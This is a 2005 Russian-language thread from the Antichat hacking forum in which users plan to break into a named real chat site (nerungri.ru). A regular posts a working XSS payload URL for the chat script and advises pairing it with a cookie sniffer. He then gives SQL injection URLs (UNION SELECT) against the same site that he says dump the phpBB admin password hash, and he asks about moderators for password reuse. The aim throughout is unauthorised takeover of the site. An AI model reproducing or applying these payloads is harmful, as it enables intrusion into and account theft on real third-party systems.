ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Какие дыры у него есть?
  #1  
Старый 25.12.2005, 21:09
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию Какие дыры у него есть?

Чат http://www.nerungri.ru/cgi-bin/chat/chat.cgi
ничё не могу сделать, КАКИЕ ДЫРЫ У НЕГО?
 
Ответить с цитированием

  #2  
Старый 25.12.2005, 21:18
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>

подставь сниффер и закодируй в URL
 
Ответить с цитированием

  #3  
Старый 26.12.2005, 13:10
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию

Поставил сниффер а как URL закодировать,
и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!

Последний раз редактировалось Razial; 26.12.2005 в 13:15..
 
Ответить с цитированием

  #4  
Старый 27.12.2005, 10:44
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию

Вот если я подставляю снифер:
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>

а дальше чё???

вот ещё
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3D дрес>

Последний раз редактировалось Razial; 27.12.2005 в 11:30..
 
Ответить с цитированием

  #5  
Старый 27.12.2005, 13:32
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

я поподробнее посмотрел, там куки красть бесполезно, нужна сессия
 
Ответить с цитированием

  #6  
Старый 27.12.2005, 15:58
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию

И как узнать сессию?
Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу
http://www.nerungri.ru/cgi-bin/chat/config.cgi
его оттуда никак не достать?

Последний раз редактировалось Razial; 27.12.2005 в 16:04..
 
Ответить с цитированием

  #7  
Старый 28.12.2005, 19:10
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/*

http://www.nerungri.ru/site/cnews/ar...%20user_id=2/*

вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату
 
Ответить с цитированием

  #8  
Старый 28.12.2005, 20:53
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию

Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?

Последний раз редактировалось Razial; 28.12.2005 в 21:05..
 
Ответить с цитированием

  #9  
Старый 28.12.2005, 21:02
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?
 
Ответить с цитированием

  #10  
Старый 28.12.2005, 21:07
Аватар для Razial
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме:
21874

Репутация: 0
По умолчанию

Nikita, RaKoT, 1inch
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли дыры в чатах interchat.ru? bike Чаты 2 23.12.2005 12:35
Есть ли дыры в форумах fastbb Kreps Форумы 4 03.12.2005 00:05
Помогите с чатом _http://www.smchat.ru Есть ли там дыры? bike Чаты 0 25.11.2005 15:14
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ